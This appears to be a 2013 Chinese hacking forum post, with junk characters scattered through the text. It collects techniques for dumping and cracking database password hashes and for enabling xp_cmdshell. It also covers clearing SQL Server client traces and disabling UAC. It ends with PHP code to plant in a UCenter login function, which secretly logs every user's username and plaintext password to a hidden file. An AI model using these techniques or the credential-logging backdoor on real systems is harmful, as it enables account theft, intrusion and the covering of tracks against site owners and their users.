;antian365.asp;antian365.jpg
p( w4 k( E/ m. ^) b2 |4 j5 R
) ~: |7 x6 `) F各种类型数据库抓HASH破解最高权限密码!
* j: d& E; \2 I1 U2 ~- G" c: G1.sql server2000- W* y/ B! S+ N* n1 W
SELECT password from master.dbo.sysxlogins where name='sa'
* F+ @- L" ~: t' W" r0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
! s# x) |' j6 q' g& n) v2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
: ]* S% h+ v" U4 R1 P; |; |- ^
8 ?* T4 [8 _, O- l5 r0×0100- constant header: y& r7 ~7 Q% x" v1 s% B1 t
34767D5C- salt
+ ~2 A+ X/ X+ k3 h( u0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
' m8 v8 f+ }- e8 O2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash/ J* [7 _' ?" b
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash. u* H8 T" b6 P, B. _' T( e8 W$ q
SQL server 2005:-. M- {$ o! P, @4 i2 b+ D. J
SELECT password_hash FROM sys.sql_logins where name='sa'( ?3 B: h0 C4 Q0 s0 r
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F* S+ v+ R& r9 q( o! x: m' X) I$ E' F& H6 Y
0×0100- constant header9 _& p9 V; v- p0 U
993BF231-salt5 z+ n" ?* {# r* {& d
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
1 m+ ^3 L% ]6 w1 V; `/ Y; O9 |crack case sensitive hash in cain, try brute force and dictionary based attacks.% B0 C4 G6 D- J$ D t
3 i! `9 I6 x6 I3 E/ ~0 w, gupdate:- following bernardo’s comments:-1 F# Z ~' b2 @. t8 }
use function fn_varbintohexstr() to cast password in a hex string.
; H% O, ?, M" {) e8 Xe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins) {5 _1 y3 w. v' k, H; |7 i4 }( ?$ l
. N8 g6 J+ I; A1 @" g8 I7 c! TMYSQL:-
0 `& x; \' ?: S' X) R
, V7 `$ J; D7 ]! QIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
" L9 j8 Z. k# |# T) H" l/ e6 t7 w; K( w Q6 @8 a
*mysql < 4.1; j% Y7 p, C+ A& D: }- D5 ?, j
7 n, N# r( x& h, W5 s
mysql> SELECT PASSWORD(‘mypass’);
3 y% D% I j( u+——————–+- J9 u% \$ J: `/ o3 n2 [
| PASSWORD(‘mypass’) |
4 P1 H% ~, S# F$ o+——————–+
) [" Z! r- x# l; X" z1 C| 6f8c114b58f2ce9e |/ \# X; j4 J+ J( e. |5 S
+——————–+% @" a5 c8 L6 ]6 q- a1 M
, d1 Z2 `; K0 m
*mysql >=4.18 {' g4 M; E8 I5 r) \( \
' o- t8 p$ q& G' z2 w- umysql> SELECT PASSWORD(‘mypass’);
: h& Q5 B" `" ^% K+——————————————-+
% \0 I0 q/ E2 `| PASSWORD(‘mypass’) |& h& ?( B% r& B& @: w
+——————————————-+
. d3 b5 _2 J: a| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
' q& C, C* A" B9 L+ m6 U9 o0 N+——————————————-+6 T5 x" O1 Z ]( J. A- }6 J
: G' A# R- Z7 H0 W5 t( t0 _
Select user, password from mysql.user
g) R# S4 D1 ]5 I3 n" U! uThe hashes can be cracked in ‘cain and abel’! V9 v3 x: K3 Y% ~0 N1 t' p* @
A+ B7 b8 o6 G4 n
Postgres:-
9 \) W! Q% N* c' t. PPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
! L: l4 r; `! f$ a f9 wselect usename, passwd from pg_shadow;* H0 i2 e. P+ m$ }
usename | passwd
. n' g. I y3 w" k {7 ]——————+————————————-8 ]: X' d8 {9 O g3 \( a
testuser | md5fabb6d7172aadfda4753bf0507ed43965 A( S5 O' Z, O
use mdcrack to crack these hashes:-. U# P. p N8 H% c3 W3 T3 n
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
% |" c: `: v+ S: Y: U# z9 F# D9 L! P, [3 v5 a+ j( b
Oracle:-
# @9 a, g, o) g# e2 Aselect name, password, spare4 from sys.user$1 r* c. Y |) S& X5 g( q( g
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g* a. e8 m; G# U/ ]* X4 z
More on Oracle later, i am a bit bored….
+ `7 N9 \9 w, Z
9 W; O" N! K8 G" O0 _' U% C; T& ~
: w7 B- A4 e* v7 e+ W! T在sql server2005/2008中开启xp_cmdshell
5 G. p |# l" }$ _4 O l/ y/ }: y-- To allow advanced options to be changed.
. }8 E- P! Y4 l5 |; y* WEXEC sp_configure 'show advanced options', 1- ?! Q( J( ^+ m L! \
GO
: {. c- c, g* |, ^-- To update the currently configured value for advanced options.
3 a* ]2 ]+ M6 q6 ^# k- g7 X! IRECONFIGURE
5 }7 [$ i. p# l4 V3 bGO
9 b- F+ p7 b- Q! D-- To enable the feature.2 Y; a! d' j: g9 r$ `! D
EXEC sp_configure 'xp_cmdshell', 1
) I" A! f1 _; B( g% jGO
$ l4 H g* O& W' u-- To update the currently configured value for this feature.
: s* `: q1 R: b* ^" ?RECONFIGURE2 v- T& h. X6 o' L- u( u
GO9 e( {" w. h0 |2 k" C8 ^, q6 _6 \
SQL 2008 server日志清除,在清楚前一定要备份。- t* i$ S5 O1 E3 I9 l, c1 l5 h2 q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
$ p, r- n, t, v) A7 F/ rX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin/ E9 ^& R: A" }4 n+ K% R! o5 f
: } b% C" I* h# f3 T& _对于SQL Server 2008以前的版本:% Y2 S1 ~5 {0 k; {
SQL Server 2005:
! m m5 o9 q& l# N9 h删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat7 I- @2 W% A& v8 ~& U
SQL Server 2000:% O' C+ _. S' K% F3 x% }/ g
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
2 i9 k F7 e$ ?
& g7 d, e1 A: |; S. t本帖最后由 simeon 于 2013-1-3 09:51 编辑
; o8 j8 W- g0 w( c* k! @
# P) \* D0 T/ E1 {6 N7 G; x8 ~- ]+ m4 P
windows 2008 文件权限修改" f' d/ s3 D1 d# L ?" u
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
" W. F1 H# c/ v+ g8 j4 x2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98( K5 Z& M7 a$ l# j. T
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
9 f/ h! d; M: s4 g) Q/ B: M2 ~/ E, i9 _8 K7 {
Windows Registry Editor Version 5.00
: S4 I3 @7 B, i. W! H4 {[HKEY_CLASSES_ROOT\*\shell\runas]
- ]. H% E2 }9 U3 p4 ~' I0 [0 F( N9 }@="管理员取得所有权"
# {% g( ^ w9 z" k# D"NoWorkingDirectory"="", D% V2 n6 o; x: {1 u; I% X
[HKEY_CLASSES_ROOT\*\shell\runas\command]7 s$ ` ]% ^7 W) s4 O7 W
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 d$ ~9 D; v- x1 V( l9 y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, J, `2 J' d( ?; ?[HKEY_CLASSES_ROOT\exefile\shell\runas2]
: e+ m- e4 Y$ h4 C% i: E, |# ^@="管理员取得所有权"8 x O. t* {3 Y' n% r1 L8 m
"NoWorkingDirectory"="": ]4 N. v+ O' {$ q
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]7 R& n1 C. g8 \2 f3 f
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ z) \9 x* f5 E3 O0 m( P# V: B"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" h2 \2 d% A- A- c4 } f0 X+ ]
* @) \( c4 ~2 D" j[HKEY_CLASSES_ROOT\Directory\shell\runas]
2 M" k# J! _' h; N1 R) s! o@="管理员取得所有权"( g$ G" t0 |* O- ^
"NoWorkingDirectory"=""
4 x2 e- m& i' E* c, c: e# K" k[HKEY_CLASSES_ROOT\Directory\shell\runas\command]4 D- ^; Z# b X
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
2 E9 h. A4 ?, G9 Y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ J$ e6 H2 v) f9 r/ |( E1 O
+ g8 h. n* Z1 ^1 u& V+ U' p. c* l( V
win7右键“管理员取得所有权”.reg导入
( ?) }4 l7 K+ U. q# n6 q二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
& D, |; C: s4 @9 L0 l1、C:\Windows这个路径的“notepad.exe”不需要替换# a" |3 l s& B% ^# h/ _, y; f
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
- b3 X. u% _2 O3、四个“notepad.exe.mui”不要管: e( Q8 F1 e1 J* q$ B8 \
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和7 t9 S0 {, N$ J
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”! P; {( E; ^2 {! Z- P
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
0 |2 |$ x+ K4 P" W& ?替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
/ ^# \9 B! P4 _0 N/ m, Qwindows 2008中关闭安全策略: ) O; S2 }( T& J0 V* _
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7 N, J0 B [) |" `1 Q
修改uc_client目录下的client.php 在
$ p, W' n/ J5 j# hfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {3 v0 t/ m" C+ F2 p. d
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
. R. {& b# [- f* a8 q" w你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
! E! O! ]" I$ {3 P7 ?1 K2 Kif(getenv('HTTP_CLIENT_IP')) {
5 ]. _# j8 w" t6 i$onlineip = getenv('HTTP_CLIENT_IP');
$ e* T% T7 Q. y$ x# T) Q0 p2 Y4 T# u} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
5 a/ j$ x! c% F& b9 A7 w$onlineip = getenv('HTTP_X_FORWARDED_FOR');
6 i; W8 d* ^4 t1 A; Z o} elseif(getenv('REMOTE_ADDR')) {
8 Y# `, ~4 i2 L7 k6 Y$onlineip = getenv('REMOTE_ADDR');
2 B3 o/ s7 C0 [8 g5 \, {} else {
) D8 t0 T. f2 P4 e; v$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ ?* }$ ]% ]9 H, c* m}
A6 _# v' |( \. X $showtime=date("Y-m-d H:i:s");9 L0 S7 A( @5 c! ]; a4 W& b* |
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";6 |+ ?2 k, i2 P/ r$ u/ C1 _, k/ z
$handle=fopen('./data/cache/csslog.php','a+');( C8 R+ i( [1 B* M. v' U) [( c p1 F( s
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对